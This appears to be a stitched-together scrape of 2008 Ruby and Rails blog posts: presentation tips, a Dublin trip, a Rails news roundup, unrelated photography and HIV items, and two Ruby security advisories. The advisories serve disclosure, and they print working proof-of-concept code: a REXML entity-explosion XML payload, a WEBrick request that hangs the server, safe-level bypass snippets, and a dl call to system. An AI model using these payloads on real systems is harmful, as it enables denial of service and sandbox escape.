Ive had to rely at times on silence and on talking quick / Defending myself with nothing but my walking stick. Buck65

Here are nine easy tips that will help you communicate better at your next conference.

Figure A Can you read me now?

Dan Grigsbys presentation at RubyFringe was an intentional example of this. All the titles were at the top, with humorous stock photos below.

Keep it in the top third, if possible.

Figure B Takahashi-san frowns on your tiny fonts

Giles Bowkett is such an entertaining speaker that people once skipped the first 20 minutes of lunch to hear the remainder of his presentation at RubyFringe (which involved more than 400 slides).

He also used only the typefaces included with Mac OS X, including Futura Condensed Medium and Condensed ExtraBold, which work really well in bright colors on black. So even if you dont choose to buy a single typeface, you can assemble a great-looking presentation.

• Giles Bowkett Videos Start 5 minutes in to see the slides.

Figure C Working well and looking good

Its easy with either:

Copy as RTF A TextMate plugin. You can paste the syntax-highlighted text and even edit it afterward in Keynote.

pygments A command-line syntax highlighter written in Python. Its used at GitHub to emit HTML but can also emit RTF from any source file. The resulting rich text can be pasted into Keynote.

pygmentize -f rtf -o out.rtf code.rb

Figure D Stay on target

Choosing just the right transition can soak up a lot of time and adds absolutely nothing to the content that people remember afterward.

Dan Grigsby also noted that transitions and multi-step builds make it difficult to go back and forth in the presentation since you have to wait for the transition to finish. Unless

Figure E An unforced fumble while trying to backtrack

Useful Keynote shortcuts (while the presentation is playing).

Figure F The conference wifi WILL fail when you need it most

I love live coding but often it goes awry, creating an awkward situation for both the presenter and the audience.

Give yourself some insurance and either record a short screencast that you can narrate during the presentation, or take screenshots that you can refer to.

Extra Credit!

Figure G Is grey a color?

If youre speaking at a conference, youre probably doing it to promote yourself, your projects, or your business. Make it stick in peoples minds by distinguishing yourself with a color scheme and a typeface that communicate the attitude you want to be remembered for.

Choose a color scheme and use it for all your presentations. Ideally, it would be the color scheme of your company or personal blog. If youve paid for a corporate identity, use it!

Resources

• Color Burn Widget A Mac OS X dashboard widget with a new color scheme every day.
• ColourLovers.com Tons of color combinations for every attitude.

Figure H An easy way to stand out

Again, buy a typeface and use it on your blog and in your presentations.

Theyre not as expensive as you might think! You can get a single font for $20.

Here are some nice condensed ones as mentioned above:

• Antenna
• Caslon
• Block Gothic
• Garage Gothic

Or try these shops:

• FontShop
• Sudtipos
• Vllg
• T.26
• Process Type Foundry
• H&FJ
• Typographica

Figure I Free as in not chained to the spacebar

I saved my favorite for the end

A presentation remote gives you the freedom to step away from the lectern and talk directly to the audience. The remote that comes with Mac laptops doesnt count! It only works if you have a direct line of sight to the infrared receiver on the front edge of the laptop.

A radio frequency transmitter works much better. The Kensington Presentation Remote can be bought for about $40. It works out of the box without the need to install any drivers, and its less distracting than phone-based options.

See you in Berlin!

Ill be in Berlin at RailsConf starting this Sunday. Find me and get a free PeepCode t-shirt!

UPDATE Thanks for the 40 replies right away! Weve hired an individual for the position.

Dublin

Figure A Dublin from my hotel window

I had a great time in Dublin at the end of June. I spoke at an open source conference and met several other Rubyists while I was there.

Ive frequently felt that I should bring home some tchotchke from each of the places I visit. While in Dublin I realized that its not extra things that I really want, its people!

If youre traveling for business or pleasure, I highly suggest that you find the local Ruby group or find a local co-working space and meet people there. I had breakfast with Ana Nelson, who introduced me to Paul Campbell of Contrast, who is working on an error reporting webapp for Rails developers.

He introduced me to Eamon Leonard and David Coallier who happen to be a few musically inclined PHP developers. We had a great time exploring the pubs of Dublin, and I learned that Guinness beer has a different taste in Dublin than anywhere else in the world.

Oh, and a few members of Ruby Ireland hosted a nice dinner in the city.

So the next time you find yourself in an unknown city, meet the locals!

Figure B Dublin alley

Figure C Clocks at the Contrast co-working space

Figure D Ruby Ireland meetup

Elsewhere

I just published a new PeepCode screencast about Phusion Passenger (technical editing by Phusion staff).

Ill be speaking about podcasting and entrepreneurship at BizJam Seattle on Wednesday, July 9.

Jim Freeze wanted me to mention that the Lone Star Ruby Conference is open for registration. Ill be at RailsConf in Berlin at that time, but Im sure it will be a great conference if you can get yourself to Texas. I frequently post other worldwide conference and workshop events at Ruby on Rails Workshops.

Also, Ive helped to launch a Deck-like ad network for Ruby blogs. We have several top quality publishers and have a few spots for advertisers. If you have a product, website, or service that would be of interest to Rubyists, check out Ruby Row.

Figure A Special Edition Silver PeepCode T-Shirt

Some of the things Ill be bringing to RailsConf 2008 in Portland next week:

Live Podcast Interviews!

My friends at Heroku have offered me a couch at their booth in the exhibit hall to perform a few podcasts. Come see a Rails Podcast recorded live during lunch and afternoon breaks!

Sessions

Ill be moderating one panel and attending an evening session.

Welcome to the sixth addition of This Week in Rails, where well take a look of the past two weeks of innovation in the Rails community. If youd rather listen to this content on your ipod with additional Ruby news, check out the Rails Envy Podcast #47 and #48.

The Rails Guides Hackfest is in full swing, improving the Rails documentation by leaps and bounds. Rails Routing from the Outside In by Mike Gunderloy is a great read if youre ever confused by Rails Routing. If you want to help with the Guide hackfest, there are several guides up that you can help review.

If you ever need to build a website which allows users to upload videos and then needs to encode them, definitely check out Panda, an open source video encoding application which uses EC2, S3, and SimpleDB. The application itself is written in Merb, but its designed to run separately on ec2 and can easily integrate with your rails app on the front end.

If youd like to ensure your Rails application is well written, Matt More wrote up a Rails Code Quality Checklist which serves as a great guide to Rails best practices. Also, if you need help discovering where your code might need a little re-factoring check out Roodi a new gem by Marty Andres that gives you instant feedback about your Ruby code by examining a few metrics including cyclomatic complexity, method length, bad method names, and blank blocks or loops. Lastly, if youve been following the skinny controller, fat model best practice, you may have found yourself with really fat models (not so good). Paul Barry suggests one way to deal with this using concerned_with.

If youre about to start a new Rails application then you might consider using Bort, a Rails starter application from Jim Neath. Bort contains RESTful Auth, Will Paginate, Exception Notifier, Asset Packager, a Capistrano Recipe, and everything is tested by RSpec. If youd rather start your system with email login instead of username, Matt Hall put together a fork of bort for this.

Implementing a page with multiple file uploads in Rails is no easy task. Luckily, Brian Getting wrote up a tutorial which makes it look easy.

Clemens Kofler wrote up a Guide to Memoization which walks through all the details of this convention and looks at the new memoize helper in Edge Rails ActiveSupport. If you dont know what this word means, please do take the time to read his tutorial.

If youve ever developed a plugin, you may have just decided to manually run your tests every time you change your code. Last week Ken Collins recently put out a new library called Autotest Railsplugin which makes it dirt simple to run autotest on plugins youre developing.

Lastly, if youre looking for other Ruby/Rails podcasts, check out the Rails Podcast which recently featured Jim Weirich at erubycon, Rubyology which recently interviewed Avi Bryant, the Learning Rails podcast which recently covered how to deploy your rails app, Railscasts which recently covered starling and workling, and the Rails Brazil Podcast if you speak Portuguese.

Thats all for now. If you create or discover any notable tools or blog posts this week, feel free to send me an email (Gregg@RailsEnvy).

Image Credit: Still on the right track by janusz l

Sven Fuchs gave a great presentation at RailsConf Europe about the history and details of the forth-coming I18n support in Rails 2.2. Well worth reading if youre in need of internationalization services for your current or future app.

Im pleased to finally announce the Rails Guides Hackfests. And we got really exciting prizes too! There is a list of guides available at Lighthouse You can select one of those, update the ticket and start writing the guide straight away.

For each completed guide, the author will receive all of the following prizes :

• $200 from Caboose Rails Documentation Project
• 1 year of GitHub Micro account
• 1 year of RPM Basic (Production performance management) for up to 10 hosts

You can find more details at http://hackfest.rubyonrails.org/guide

Special thanks to GitHub, Newrelic & Caboose documentation project for making the hackfest a lot more exciting!

A photographer talks about how he edits his photos and collects editing approaches from other photographers as well.

You usually have a hunch, but the great thing about photography is that it's so unpredictable, so you never quite understand how and when a good photograph comes about. But when editing, I do contact sheets, then machine prints and then select from that.

And when asked what makes one image stand out more than another, is it emotional or an intellectual reaction he answers: "It must be intuitive. If it were intellectual, I'd be able to explain what happens. That's why I'm a photographer. I express myself visually, not verbally.

Two main themes emerge: 1) take some time off from your images in order to evaluate them more fairly, and 2) edit with an outside party, someone you trust to be tough but fair. (via conscientious)

A new study suggests that HIV jumped from apes to humans around the turn of the 20th century, which coincides with the development of colonial cities in sub-Saharan Africa.

HIV was and remains a "relatively poorly transmitted" virus, he said, so the key to the success of the virus was possibly the development of cities such as Leopoldville in the early 1900s.

The large numbers of people living in close proximity would have allowed more opportunity for new infections.

"I think the picture that has emerged here, is that changes the human population experienced may have opened to the door to the spread of HIV," he said.

Several photo series of fashion models transforming into different outfits. It's amazing how different they can look with changes in makeup, hair, and clothes.

Ruby Manor is an interesting new event that will hopefully become a regular fixture on the Ruby events calendar! Taking place in London (at the University of London Union) on November 22, Ruby Manor is taking an "all hands on deck" approach to event organization, with intense discussion between attendees as to how it should be run. The initial organizers are Murray Steele and James Adam.

JS.Class is an attempt at making JavaScript more Ruby-like. More specifically, it's a library that makes object oriented development easier in JavaScript (in comparison to JS's prototype technique, at least) by implementing Ruby's core object, module, and class systems as well as some of Ruby's meta-programming techniques.

As well as ports of Enumerable, Observable, Comparable, and Forwardable, you get subclassing, mixins, reflection, late-binding arguments, singleton methods, method binding, and Ruby-like inheritance. Of course, JavaScript gives access to many of these elements already,

Remember RubyFringe, the avant-garde Ruby conference held in Canada this September? According to most reports, it went down as possible the best Ruby conference ever and spawned some very interesting presentations - that those of us who didn't go wouldn't have seen..

Luckily, in conjunction with InfoQ, videos from RubyFringe are making it online - so far there are four to check out:

RubyConf 2008 is sold out

However, there is a waiting list you can join in case of cancellations.

There is a DoS vulnerability in the REXML library included in the Ruby Standard Library. A so-called "XML entity explosion" attack technique can be used for remotely bringing down (disabling) any application which parses user-provided XML using REXML.

Most Rails applications will be vulnerable because Rails parses user-provided XML using REXML by default.

Impact

An attacker can cause a denial of service by causing REXML to parse a document containing recursively nested entities such as:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE member [  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">]><member>&a;</member>

Vulnerable versions

1.8 series

• 1.8.6-p287 and all prior versions
• 1.8.7-p72 and all prior versions

1.9 series

• all versions

Solution

Please download the following monkey patch to fix this problem.

• <URL:http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix.rb>

Then fix your application to load rexml-expansion-fix.rb before using REXML.

require "rexml-expansion-fix"...doc = REXML::Document.new(str)...

If you have a Rails application, copy rexml-expansion-fix.rb into a directory on the load path (such as RAILS_ROOT/lib/), and put the following line into config/environment.rb.

require "rexml-expansion-fix"

If your application is Rails 2.1 or later, you can simply copy rexml-expansion-fix.rb to RAILS_ROOT/config/initializers and it will be required automatically.

By default, XML entity expansion limit is 10000. You can change it by changing REXML::Document.entity_expansion_limit. e.g.

REXML::Document.entity_expansion_limit = 1000

This fix will be made available as a gem and used by future versions of rails, but users should take corrective action immediately.

Credit

Credit to Luka Treiber and Mitja Kolsek of ACROS Security for disclosing the problem to Ruby and Rails Security Teams.

Credit to Michael Koziarski of Rails Core Team for creating the monkey patch to fix the vulnerability.

Changes

• 2008-08-29 18:46 +09:00 fixed the summary not to mislead that this vulnerability is Rails specific.

Multiple vulnerabilities have been discovered in Ruby. It's recommended that you upgrade to the latest versions.

Details

The following vulnerabilities have been discovered.

Several vulnerabilities in safe level

Several vulnerabilities in safe level have been discovered.

• untrace_var is permitted at safe level 4.

  trace_var(:$VAR) {|val| puts "$VAR = #{val}" }Thread.new do $SAFE = 4 eval %q{   proc = untrace_var :$VAR   proc.first.call("aaa") }end.join

• $PROGRAM_NAME may be modified at safe level 4.

  Thread.new do $SAFE = 4 eval %q{$PROGRAM_NAME.replace "Hello, World!"}end.join$PROGRAM_NAME #=> "Hello, World!"

• Insecure methods may be called at safe level 1-3.

  class Hello def world   Thread.new do     $SAFE = 4     msg = "Hello, World!"     def msg.size       self.replace self*10 # replace string       1 # return wrong size     end     msg   end.value endend$SAFE = 1 # or 2, or 3s = Hello.new.worldif s.kind_of?(String) puts s if s.size < 20 # print string which size is less than 20end

• Syslog operations are permitted at safe level 4.

  require "syslog"Syslog.openThread.new do $SAFE = 4 eval %q{   Syslog.log(Syslog::LOG_WARNING, "Hello, World!")   Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)   Syslog.info("masked")   Syslog.close }end.join

These vulnerabilities were reported by Keita Yamaguchi.

DoS vulnerability in WEBrick

WEBrick::HTTP::DefaultFileHandler is faulty of exponential time taking requests due to a backtracking regular expression in WEBrick::HTTPUtils.split_header_value.

Exploitable server:

require 'webrick'WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start

Attack:

require 'net/http'res = Net::HTTP.start("localhost", 2000) { |http|  req = Net::HTTP::Get.new("/passwd")  req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100  http.request(req)}p res

The request likely won't finish in this universe.

This vulnerability was reported by Christian Neukirchen.

Lack of taintness check in dl

dl doesn't check taintness, so it could allow attackers to call dangerous functions.

require 'dl'$SAFE = 1h = DL.dlopen(nil)sys = h.sym('system', 'IP')uname = 'uname -rs'.taintsys[uname]

This vulnerability was reported by sheepman.

DNS spoofing vulnerability in resolv.rb

resolv.rb allow remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports, so resolv.rb is fixed to randomize them.

• see also: CVE-2008-1447

This vulnerability was reported by Tanaka Akira.

Vulnerable versions

Solution

$ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby

Please note that a package that corrects this weakness may already be available through your package management software.

Credit

Credit to Keita Yamaguchi, Christian Neukirchen, sheepman, and Tanaka Akira for disclosing these problems to Ruby Security Team.

Changes

• 2008-08-08 12:21 +09:00 fixed the revision number of ruby 1.9.
• 2008-08-11 11:23 +09:00 fixed the patchlevel of ruby 1.8. see the release announcement of Ruby 1.8.7-p72 and 1.8.6-p287